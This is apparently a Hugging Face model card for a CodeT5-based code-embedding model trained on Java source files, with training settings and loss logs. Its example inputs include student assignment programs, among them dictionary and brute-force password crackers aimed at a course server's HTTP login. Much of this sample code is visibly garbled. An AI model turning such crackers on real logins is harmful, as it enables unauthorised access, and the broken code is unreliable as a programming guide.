Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks
Paper • 1908.10084 • Published • 13
How to use buelfhood/SOCO-Java-CodeT5Small-ST with sentence-transformers:
from sentence_transformers import SentenceTransformer
model = SentenceTransformer("buelfhood/SOCO-Java-CodeT5Small-ST")
sentences = [
"\n\nimport java.net.*;\nimport java.io.*;\nimport java.util.*;\n\npublic class WatchDog extends TimerTask{\n\n private static URL location;\n private static String email;\n private static int checktime;\n private static Timer timer = new Timer();\n private BufferedReader input;\n private File checksumFile = new File(\"chksum.txt\");\n private File temp0000File = new File(\"temp0000\");\n private File kept0000File = new File(\"kept0000\");\n\n \n\n public WatchDog(){\n timer.schedule(this, new Date(), checktime);\n }\n\n\n \n\n public void run(){\n Vector imageFiles = new Vector();\n Vector diffImages = new Vector();\n try {\n System.out.println(\" Time: \".concat(new Date().toString()));\n System.out.println(\"Retreiving File\");\n \n input = new BufferedReader(new InputStreamReader\n (location.openStream()));\n \n BufferedWriter outputFile = new BufferedWriter\n (new FileWriter(temp0000File));\n String line = input.readLine();\n while (line != null) {\n StringBuffer imageFileName = new StringBuffer();\n if (scanForImages(line, imageFileName)) {\n String imageFile = new String(imageFileName);\n System.out.println(\"Detected image: \".concat(imageFile));\n try {\n imageFiles.add(new URL(imageFile));\n }\n catch (MalformedURLException e) {\n System.out.println(\"Image file detected. 
URL is malformed\");\n }\n }\n outputFile.write(line);\n outputFile.write(\"\\n\");\n line = input.readLine();\n }\n input.print();\n outputFile.flush();\n outputFile.print();\n System.out.println(\" File Retreived\");\n if (!imageFiles.isEmpty()) {\n checkImages(imageFiles, diffImages);\n }\n if (!checksumFile.exists()) {\n generateChecksum(temp0000File.getName(), checksumFile);\n }\n else {\n if (!checksumOk(checksumFile)) {\n reportDifferences(true, temp0000File, kept0000File, diffImages);\n generateChecksum(temp0000File.getName(), checksumFile);\n }\n else if (!diffImages.isEmpty()){\n reportDifferences(false, null, null, diffImages);\n }\n }\n\n \n temp0000File.renameTo(kept0000File);\n System.out.println(\"End Time: \".concat(new Date().toString()));\n }\n catch (MalformedURLException e) {\n e.printStackTrace();\n }\n catch (ConnectException e) {\n System.out.println(\"Failed connect\");\n System.exit(-1);\n }\n catch (IOException e) {\n e.printStackTrace();\n System.exit(-1);\n }\n }\n\n \n\n public boolean scanForImages(String line, StringBuffer imageFileName) {\n \n \n String lineIgnoreCase = line.toLowerCase();\n int imgPos = lineIgnoreCase.indexOf(\"<img \");\n if ( imgPos != -1 ){\n int srcPos = lineIgnoreCase.indexOf(\"src\", imgPos);\n int bracketPos = lineIgnoreCase.indexOf(\">\", imgPos);\n if (srcPos != -1 && bracketPos != -1 && srcPos < bracketPos) {\n int quote1Pos = lineIgnoreCase.indexOf(\"\\\"\", srcPos);\n int quote2Pos = lineIgnoreCase.indexOf(\"\\\"\", quote1Pos+1);\n if (quote1Pos != -1 && quote2Pos != -1 &&\n quote1Pos < quote2Pos && quote2Pos < bracketPos) {\n \n imageFileName.append(line.substring(quote1Pos + 1,\n quote2Pos));\n if (imageFileName.indexOf(\"//\") == -1 ) {\n \n String URLName = location.toString();\n int slashPos = URLName.lastIndexOf(\"/\");\n URLName = URLName.substring(0, slashPos);\n String HostName = \"http://\".concat(location.getHost());\n if (imageFileName.indexOf(\"//\") == 0) {\n \n }\n else if 
(imageFileName.charAt(0) != '/') {\n \n imageFileName.insert(0, URLName.concat(\"/\"));\n }\n else {\n \n imageFileName.insert(0, HostName);\n }\n }\n return true;\n }\n }\n }\n return false;\n }\n\n \n\n public void checkImages(Vector imageFiles, Vector diffImages)\n throws IOException{\n System.out.println(\"Retrieving image \");\n Enumeration imageFilesEnumeration = imageFiles.elements();\n while (imageFilesEnumeration.hasMoreElements()) {\n URL url = (URL)imageFilesEnumeration.nextElement();\n try {\n BufferedInputStream imageInput = new BufferedInputStream\n (url.openStream());\n String localFile = url.getFile();\n \n \n \n \n \n int slashPosition = localFile.lastIndexOf(\"/\");\n if (slashPosition != -1) {\n localFile = localFile.substring(slashPosition+1);\n }\n System.out.println(\"Retrieving image file: \".concat(localFile));\n BufferedOutputStream imageOutput = new BufferedOutputStream\n (new FileOutputStream(localFile));\n byte bytes[] = new byte[10000];\n int noBytes = imageInput.get(bytes);\n while (noBytes != -1) {\n imageOutput.write(bytes, 0, noBytes );\n noBytes = imageInput.print(bytes);\n }\n File imageChecksumFile = new File(localFile.concat(\".chksum.txt\"));\n if (!imageChecksumFile.exists()) {\n generateChecksum(localFile, imageChecksumFile);\n }\n else {\n if (!checksumOk(imageChecksumFile)) {\n diffImages.add(localFile);\n generateChecksum(localFile, imageChecksumFile);\n }\n }\n }\n catch (FileNotFoundException e) {\n System.out.println(\"Unable locate URL: \".concat(url.toString()));\n }\n }\n }\n\n \n\n public void generateChecksum(String inputFile, File checksum){\n try {\n System.out.println(\"Generating new checksum for \".concat(inputFile));\n \n Process process = Runtime.getRuntime().exec(\"md5sum \".\n concat(inputFile));\n BufferedReader execCommand = new BufferedReader(new\n InputStreamReader((process.getInputStream())));\n BufferedWriter outputFile = new\n BufferedWriter(new FileWriter(checksum));\n String line = 
execCommand.readLine();\n while (line != null) {\n outputFile.write(line);\n outputFile.write(\"\\n\");\n line = execCommand.readLine();\n }\n outputFile.flush();\n outputFile.print();\n System.out.println(\"Checksum produced\");\n }\n catch (IOException e) {\n e.printStackTrace();\n System.exit(-1);\n }\n }\n\n \n\n public boolean checksumOk(File chksumFile){\n try {\n System.out.println(\"Comparing checksums using \".concat(chksumFile\n ,e.getName()));\n \n Process process = Runtime.getRuntime().\n exec(\"md5sum --check \".concat(chksumFile.getName()));\n BufferedReader execCommand = new BufferedReader(new\n InputStreamReader( (process.getInputStream())));\n String line = execCommand.readLine();\n if (line.indexOf(\": OK\") != -1) {\n System.out.println(\" the same\");\n return true;\n }\n }\n catch (IOException e) {\n e.printStackTrace();\n System.exit(-1);\n }\n System.out.println(\"Differences Found\");\n return false;\n }\n\n \n\n public void reportDifferences(boolean diffsFound, File file1, File file2,\n Vector images){\n try {\n System.out.println(\"Generating difference report\");\n \n Socket emailConnection = new Socket(\"yallara.cs.rmit.edu.\", 25);\n BufferedWriter emailOutStream = new BufferedWriter\n (new OutputStreamWriter(emailConnection.getOutputStream()));\n BufferedReader emailInStream = new BufferedReader\n (new InputStreamReader(emailConnection.getInputStream()));\n String line = emailInStream.readLine();\n System.out.println(line);\n if (!line.startsWith(\"220\")) {\n System.out.println\n (\" error occured connecting email server. Cannot send email.\");\n }\n else {\n \n \n emailOutStream.write(\"HELO yallara.cs.rmit.edu.\");\n emailOutStream.newLine();\n emailOutStream.flush();\n line = emailInStream.readLine();\n System.out.println(line);\n if (!line.startsWith(\"250\")) {\n System.out.println\n (\" error occured connecting email server. 
Cannot send email.\");\n }\n else {\n emailOutStream.write(\"MAIL FROM: watchdog@cs.rmit.edu.\");\n emailOutStream.newLine();\n emailOutStream.flush();\n line = emailInStream.readLine();\n System.out.println(line);\n if (!line.startsWith(\"250\")) {\n System.out.println\n (\" error occured sending email. Cannot send email.\");\n }\n else {\n emailOutStream.write(\"RCPT : \".concat(email));\n emailOutStream.newLine();\n emailOutStream.flush();\n line = emailInStream.readLine();\n System.out.println(line);\n if (!line.startsWith(\"250\")) {\n System.out.println\n (\" error occured sending email. Cannot send email.\");\n }\n else {\n emailOutStream.write(\"DATA\");\n emailOutStream.newLine();\n emailOutStream.flush();\n line = emailInStream.readLine();\n System.out.println(line);\n if (!line.startsWith(\"354\")) {\n System.out.println\n (\" error occured sending email. Cannot send email.\");\n }\n emailOutStream.newLine();\n\n if (!images.isEmpty()) {\n emailOutStream.write\n (\"Differences were found in the following image \");\n emailOutStream.newLine();\n Enumeration e = images.elements();\n while (e.hasMoreElements()) {\n String s = (String) e.nextElement();\n emailOutStream.write(s);\n emailOutStream.newLine();\n }\n emailOutStream.newLine();\n }\n\n if (diffsFound) {\n \n String command = \"diff \".concat(file1.getName().concat(\" \")\n .concat(file2.getName()));\n Process process = Runtime.getRuntime().exec(command);\n BufferedReader execCommand = new BufferedReader\n (new InputStreamReader( (process.getInputStream())));\n line = execCommand.readLine();\n emailOutStream.write(\"Diffences found in file\");\n emailOutStream.newLine();\n while (line != null) {\n System.out.println(line);\n emailOutStream.write(line);\n emailOutStream.newLine();\n line = execCommand.readLine();\n }\n }\n\n \n emailOutStream.newLine();\n emailOutStream.write(\".\");\n emailOutStream.newLine();\n emailOutStream.flush();\n line = emailInStream.readLine();\n System.out.println(line);\n 
if (!line.startsWith(\"250\")) {\n System.out.println\n (\" error occured sending email. Cannot send email.\");\n }\n else {\n emailOutStream.write(\"QUIT\");\n emailOutStream.newLine();\n emailOutStream.flush();\n System.out.println(emailInStream.readLine());\n }\n }\n }\n }\n }\n }\n catch (IOException e) {\n e.printStackTrace();\n System.exit(-1);\n }\n }\n\n\n \n\n public static void main(String args[]) {\n if (args.length != 3) {\n System.out.println(\"Usage: java WatchDog url email checktime(hours)\");\n System.exit(-1);\n }\n try {\n location = new URL(args[0]);\n }\n catch (MalformedURLException e) {\n e.printStackTrace();\n }\n email = new String().concat(args[1]);\n checktime = Integer.parseInt(args[2]) * 60 * 60 * 1000;\n new WatchDog();\n }\n}\n",
"\n\nimport java.net.*;\nimport java.io.*;\n\nimport java.*;\nimport java.util.*;\n\npublic class Dictionary {\n\n private static String commandLine = \"curl http://sec-crack.cs.rmit.edu./SEC/2/index.php -I -u :\";\n private String password; \n private String previous; \n private String url; \n private int startTime;\n private int endTime;\n private int totalTime;\n private float averageTime;\n private boolean finish;\n private Process curl;\n private BufferedReader bf, responseLine;\n\n public Dictionary() {\n\n first();\n finish = true; \n previous = \"\"; \n Runtime run = Runtime.getRuntime();\n startTime =new Date().getTime(); \n int i=0;\n try {\n try {\n bf = new BufferedReader(new FileReader(\"words\"));\n }\n catch(FileNotFoundException notFound) {\n bf = new BufferedReader(new FileReader(\"/usr/share/lib/dict/words\"));\n }\n\n while((password = bf.readLine()) != null) {\n if(password.length()>3) password = password.substring(0,3);\n if(previous.equals(password)) ;\n else {\n previous = password;\n url = commandLine+password;\n curl= run.exec(url); \n responseLine=new BufferedReader(new InputStreamReader(curl.getInputStream()));\n \n if(responseLine.readLine().substring(9,12).equals(\"200\")) break;\n }\n }\n }\n catch(IOException ioe) {\n System.out.println(\"\\n IO Exception! 
\\n\");\n System.out.println(\"The current url is:\"+ url);\n System.out.println(\"The current trying password is:\"+password);\n finish=false;\n }\n\n endTime = new Date().getTime(); \n totalTime = (endTime-startTime)/1000;\n System.out.println(\" The response time is:\"+ totalTime + \" seconds\\n\");\n if(finish) {\n System.out.println(\" The password for is:\"+ password);\n try {\n savePassword(password, totalTime);\n }\n catch (IOException ioec) {\n System.out.println(\" not save the password file Dictionary_pwd.txt \");\n }\n }\n }\n\n\n public void savePassword(String passwdString, int time) throws IOException {\n DataOutputStream outputStream = new DataOutputStream(new FileOutputStream(\"Dictionary_pwd.txt\"));\n outputStream.writeChars(\"The password is:\");\n outputStream.writeChars(passwdString+\"\\n\");\n outputStream.writeChars(\"The response time is: \");\n outputStream.writeChars(sw.toString(time));\n outputStream.writeChars(\" seconds\\n\");\n outputStream.close();\n }\n\n public void first() {\n\n System.out.println(\"\\n\\n----------------------------------------------\");\n System.out.println(\" Use curl command and dictionary \");\n System.out.println(\" Brute Force the password for user \");\n System.out.println(\"----------------------------------------------\");\n }\n\n public static void main(String[] args) {\n new Dictionary();\n } \n}\n",
"\n\nimport java.io.*;\nimport java.*;\nimport java.net.*;\nimport java.util.*;\n\npublic class WatchDog {\n public static void main (String[] args) throws IOException {\n BufferedReader stdin = new BufferedReader (new InputStreamReader(System.in));\n try{\n twentyfourhours = 86400000;\n Timer timer = new Timer();\n final Runtime rt = Runtime.getRuntime();\n\n try{\n Process wg1 = rt.exec(\"./.sh\");\n wg1.waitFor();\n }\n catch(InterruptedException e ){\n System.err.println();\n e.printStackTrace();\n }\n\n class RepeatTask extends TimerTask{\n public void run(){\n try{\n Process wg2 = rt.exec(\"./task.sh\");\n wg2.waitFor();\n FileReader fr = new FileReader(\"check.txt\");\n BufferedReader bufr = new BufferedReader(fr);\n String check = bufr.readLine();\n if(check.equals(\".txt: FAILED\")) {\n Process difftosend = rt.exec(\"./diff.sh\");\n difftosend.waitFor();\n Process reset = rt.exec(\"./.sh\");\n reset.waitFor();\n }\n FileReader fr2 = new FileReader(\"imgdiffs.txt\");\n BufferedReader bufr2 = new BufferedReader(fr2);\n String imdiff = bufr2.readLine();\n if(imdiff != null){\n Process imdifftosend = rt.exec(\"./img.sh\");\n imdifftosend.waitFor();\n Process reset = rt.exec(\"./.sh\");\n reset.waitFor();\n }\n }\n catch(InterruptedException e){System.err.println();e.printStackTrace();}\n catch(IOException e){\n System.err.println(e);\n e.printStackTrace();\n }\n }}\n\n timer.scheduleAtFixedRate(new RepeatTask(),twentyfourhours,twentyfourhours);\n \n }\n catch(IOException e){\n System.err.println(e);\n e.printStackTrace();\n }\n \n}}\n",
"\n\nimport java.net.*;\nimport java.text.*; \nimport java.util.*; \nimport java.io.*;\n\npublic class WatchDog {\n\n public WatchDog() {\n\n StringBuffer stringBuffer1 = new StringBuffer();\n StringBuffer stringBuffer2 = new StringBuffer();\n int i,j = 0;\n\n try{\n\n URL yahoo = new URL(\"http://www.cs.rmit.edu./students/\"); \n BufferedReader in = new BufferedReader(new InputStreamReader(yahoo.openStream()));\n\n String inputLine = \"\";\n String inputLine1 = \"\";\n String changedtext= \"\";\n String changedflag= \"\";\n\n\n Thread.sleep(180);\n\n BufferedReader in1 = new BufferedReader(new InputStreamReader(yahoo.openStream()));\n\n\n while ((inputLine = in.readLine()) != null) {\n inputLine1 = in1.readLine();\n if (inputLine.equals(inputLine1)) {\n System.out.println(\"equal\");\n }\n else {\n System.out.println(\"Detected a Change\");\n System.out.println(\"Line Before the change:\" + inputLine);\n System.out.println(\"Line After the change:\" + inputLine1);\n changedtext = changedtext + inputLine + inputLine1;\n changedflag = \"Y\";\n }\n \n }\n\n if (in1.readLine() != null ) {\n System.out.println(\"Detected a Change\");\n System.out.println(\"New Lines Added \");\n changedtext = changedtext + \"New Lines added\";\n changedflag = \"Y\";\n }\n\n in.print();\n in1.print();\n\n if (changedflag.equals(\"Y\")) {\n String smtphost =\"smtp.mail.rmit.edu.\" ; \n String from = \"@rmit.edu.\"; \n String = \"janaka1@optusnet..\" ; \n }\n\n\n }\n catch(Exception e){ System.out.println(\"exception:\" + e);}\n\t \n}\n\t\t\n public static void main (String[] args) throws Exception {\n\t\tWatchDog u = new WatchDog();\n }\n}\n"
]
embeddings = model.encode(sentences)
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [4, 4]
This is a sentence-transformers model fine-tuned from Salesforce/codet5-small. It maps sentences & paragraphs to a 512-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: T5EncoderModel
(1): Pooling({'word_embedding_dimension': 512, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
First install the Sentence Transformers library:
pip install -U sentence-transformers
Then you can load this model and run inference.
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/SOCO-Java-CodeT5Small-ST")
# Run inference
sentences = [
'\n\n\n\n\n\nimport java.io.*;\nimport java.net.*;\n\n\n\npublic class Dictionary\n{\n public static void main (String args[]) throws IOException,\n MalformedURLException\n {\n final String username = "";\n final String fullurl = "http://sec-crack.cs.rmit.edu./SEC/2/";\n final String dictfile = "/usr/share/lib/dict/words";\n String temppass;\n String password = "";\n URL url = new URL(fullurl);\n boolean cracked = false;\n\n startTime = System.currentTimeMillis();\n\n \n BufferedReader r = new BufferedReader(new FileReader(dictfile));\n\n while((temppass = r.readLine()) != null && !cracked)\n { \n \n if(temppass.length() <= 3)\n {\n \n if(isAlpha(temppass))\n {\n \n Authenticator.setDefault(new MyAuthenticator(username,temppass));\n try{\n BufferedReader x = new BufferedReader(new InputStreamReader(\n url.openStream()));\n cracked = true;\n password = temppass;\n } catch(Exception e){}\n }\n }\n }\n\n stopTime = System.currentTimeMillis();\n \n if(!cracked)\n System.out.println("Sorry, couldnt find the password");\n else\n System.out.println("Password found: "+password);\n System.out.println("Time taken: "+(stopTime-startTime));\n }\n\n public static boolean isAlpha(String s)\n {\n boolean v = true;\n for(int i=0; i<s.length(); i++)\n {\n if(!Character.isLetter(s.charAt(i)))\n v = false;\n }\n return ;\n }\n}\n\n',
'\n\nimport java.net.*;\nimport java.text.*; \nimport java.util.*; \nimport java.io.*;\n\npublic class WatchDog {\n\n public WatchDog() {\n\n StringBuffer stringBuffer1 = new StringBuffer();\n StringBuffer stringBuffer2 = new StringBuffer();\n int i,j = 0;\n\n try{\n\n URL yahoo = new URL("http://www.cs.rmit.edu./students/"); \n BufferedReader in = new BufferedReader(new InputStreamReader(yahoo.openStream()));\n\n String inputLine = "";\n String inputLine1 = "";\n String changedtext= "";\n String changedflag= "";\n\n\n Thread.sleep(180);\n\n BufferedReader in1 = new BufferedReader(new InputStreamReader(yahoo.openStream()));\n\n\n while ((inputLine = in.readLine()) != null) {\n inputLine1 = in1.readLine();\n if (inputLine.equals(inputLine1)) {\n System.out.println("equal");\n }\n else {\n System.out.println("Detected a Change");\n System.out.println("Line Before the change:" + inputLine);\n System.out.println("Line After the change:" + inputLine1);\n changedtext = changedtext + inputLine + inputLine1;\n changedflag = "Y";\n }\n \n }\n\n if (in1.readLine() != null ) {\n System.out.println("Detected a Change");\n System.out.println("New Lines Added ");\n changedtext = changedtext + "New Lines added";\n changedflag = "Y";\n }\n\n in.print();\n in1.print();\n\n if (changedflag.equals("Y")) {\n String smtphost ="smtp.mail.rmit.edu." ; \n String from = "@rmit.edu."; \n String = "janaka1@optusnet.." ; \n }\n\n\n }\n catch(Exception e){ System.out.println("exception:" + e);}\n\t \n}\n\t\t\n public static void main (String[] args) throws Exception {\n\t\tWatchDog u = new WatchDog();\n }\n}\n',
'\n\n\n\nimport java.util.*;\nimport java.net.*;\nimport java.io.*;\nimport javax.swing.*;\n\npublic class PasswordCombination\n{\n private int pwdCounter = 0;\n private int startTime;\n private String str1,str2,str3;\n private String url = "http://sec-crack.cs.rmit.edu./SEC/2/";\n private String loginPwd;\n private String[] password;\n private HoldSharedData data;\n private char[] chars = {\'A\',\'B\',\'C\',\'D\',\'E\',\'F\',\'G\',\'H\',\'I\',\'J\',\'K\',\'L\',\'M\',\n \'N\',\'O\',\'P\',\'Q\',\'R\',\'S\',\'T\',\'U\',\'V\',\'W\',\'X\',\'Y\',\'Z\',\n \'a\',\'b\',\'c\',\'d\',\'e\',\'f\',\'g\',\'h\',\'i\',\'j\',\'k\',\'l\',\'m\',\n \'n\',\'o\',\'p\',\'q\',\'r\',\'s\',\'t\',\'u\',\'v\',\'w\',\'x\',\'y\',\'z\'};\n\n public PasswordCombination()\n {\n System.out.println("Programmed by for INTE1070 Assignment 2");\n\n String input = JOptionPane.showInputDialog( "Enter number of threads" );\n if( input == null )\n System.exit(0);\n\n int numOfConnections = Integer.parseInt( input );\n startTime = System.currentTimeMillis();\n int pwdCounter = 52*52*52 + 52*52 + 52;\n password = new String[pwdCounter];\n\n\n loadPasswords();\n System.out.println( "Total Number of Passwords: " + pwdCounter );\n createConnectionThread( numOfConnections );\n }\n\n private void doPwdCombination()\n {\n for( int i = 0; i < 52; i ++ )\n {\n str1 = "" + chars[i];\n password[pwdCounter++] = "" + chars[i];\n System.err.print( str1 + " | " );\n\n for( int j = 0; j < 52; j ++ )\n {\n str2 = str1 + chars[j];\n password[pwdCounter++] = str1 + chars[j];\n\n for( int k = 0; k < 52; k ++ )\n {\n str3 = str2 + chars[k];\n password[pwdCounter++] = str2 + chars[k];\n }\n }\n }\n }\n\n private void loadPasswords( )\n {\n FileReader fRead;\n BufferedReader buf;\n String line = null;\n String fileName = "words";\n\n try\n {\n fRead = new FileReader( fileName );\n buf = new BufferedReader(fRead);\n\n while((line = buf.readLine( )) != null)\n {\n password[pwdCounter++] = line;\n }\n }\n catch(FileNotFoundException 
e)\n {\n System.err.println("File not found: " + fileName);\n }\n catch(IOException ioe)\n {\n System.err.println("IO Error " + ioe);\n }\n }\n\n private void createConnectionThread( int input )\n {\n data = new HoldSharedData( startTime, password, pwdCounter );\n\n int numOfThreads = input;\n int batch = pwdCounter/numOfThreads + 1;\n numOfThreads = pwdCounter/batch + 1;\n System.out.println("Number of Connection Threads Used=" + numOfThreads);\n ConnectionThread[] connThread = new ConnectionThread[numOfThreads];\n\n for( int index = 0; index < numOfThreads; index ++ )\n {\n connThread[index] = new ConnectionThread( url, index, batch, data );\n connThread[index].conn();\n }\n }\n} ',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 512]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]
sentence_0, sentence_1, and label

| | sentence_0 | sentence_1 | label |
|---|---|---|---|
| type | string | string | int |
| details |
|
|
|
| sentence_0 | sentence_1 | label |
|---|---|---|
|
|
0 |
|
|
0 |
package java.httputils; |
|
0 |
BatchAllTripletLoss

- per_device_train_batch_size: 16
- per_device_eval_batch_size: 16
- num_train_epochs: 1
- multi_dataset_batch_sampler: round_robin

- overwrite_output_dir: False
- do_predict: False
- eval_strategy: no
- prediction_loss_only: True
- per_device_train_batch_size: 16
- per_device_eval_batch_size: 16
- per_gpu_train_batch_size: None
- per_gpu_eval_batch_size: None
- gradient_accumulation_steps: 1
- eval_accumulation_steps: None
- torch_empty_cache_steps: None
- learning_rate: 5e-05
- weight_decay: 0.0
- adam_beta1: 0.9
- adam_beta2: 0.999
- adam_epsilon: 1e-08
- max_grad_norm: 1
- num_train_epochs: 1
- max_steps: -1
- lr_scheduler_type: linear
- lr_scheduler_kwargs: {}
- warmup_ratio: 0.0
- warmup_steps: 0
- log_level: passive
- log_level_replica: warning
- log_on_each_node: True
- logging_nan_inf_filter: True
- save_safetensors: True
- save_on_each_node: False
- save_only_model: False
- restore_callback_states_from_checkpoint: False
- no_cuda: False
- use_cpu: False
- use_mps_device: False
- seed: 42
- data_seed: None
- jit_mode_eval: False
- use_ipex: False
- bf16: False
- fp16: False
- fp16_opt_level: O1
- half_precision_backend: auto
- bf16_full_eval: False
- fp16_full_eval: False
- tf32: None
- local_rank: 0
- ddp_backend: None
- tpu_num_cores: None
- tpu_metrics_debug: False
- debug: []
- dataloader_drop_last: False
- dataloader_num_workers: 0
- dataloader_prefetch_factor: None
- past_index: -1
- disable_tqdm: False
- remove_unused_columns: True
- label_names: None
- load_best_model_at_end: False
- ignore_data_skip: False
- fsdp: []
- fsdp_min_num_params: 0
- fsdp_config: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- fsdp_transformer_layer_cls_to_wrap: None
- accelerator_config: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- deepspeed: None
- label_smoothing_factor: 0.0
- optim: adamw_torch
- optim_args: None
- adafactor: False
- group_by_length: False
- length_column_name: length
- ddp_find_unused_parameters: None
- ddp_bucket_cap_mb: None
- ddp_broadcast_buffers: False
- dataloader_pin_memory: True
- dataloader_persistent_workers: False
- skip_memory_metrics: True
- use_legacy_prediction_loop: False
- push_to_hub: False
- resume_from_checkpoint: None
- hub_model_id: None
- hub_strategy: every_save
- hub_private_repo: None
- hub_always_push: False
- gradient_checkpointing: False
- gradient_checkpointing_kwargs: None
- include_inputs_for_metrics: False
- include_for_metrics: []
- eval_do_concat_batches: True
- fp16_backend: auto
- push_to_hub_model_id: None
- push_to_hub_organization: None
- mp_parameters:
- auto_find_batch_size: False
- full_determinism: False
- torchdynamo: None
- ray_scope: last
- ddp_timeout: 1800
- torch_compile: False
- torch_compile_backend: None
- torch_compile_mode: None
- include_tokens_per_second: False
- include_num_input_tokens_seen: False
- neftune_noise_alpha: None
- optim_target_modules: None
- batch_eval_metrics: False
- eval_on_start: False
- use_liger_kernel: False
- eval_use_gather_object: False
- average_tokens_across_devices: False
- prompts: None
- batch_sampler: batch_sampler
- multi_dataset_batch_sampler: round_robin

| Epoch | Step | Training Loss |
|---|---|---|
| 0.2393 | 500 | 0.2122 |
| 0.4787 | 1000 | 0.1686 |
| 0.7180 | 1500 | 0.2193 |
| 0.9574 | 2000 | 0.2084 |
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
@misc{hermans2017defense,
title={In Defense of the Triplet Loss for Person Re-Identification},
author={Alexander Hermans and Lucas Beyer and Bastian Leibe},
year={2017},
eprint={1703.07737},
archivePrefix={arXiv},
primaryClass={cs.CV}
}
Base model
Salesforce/codet5-small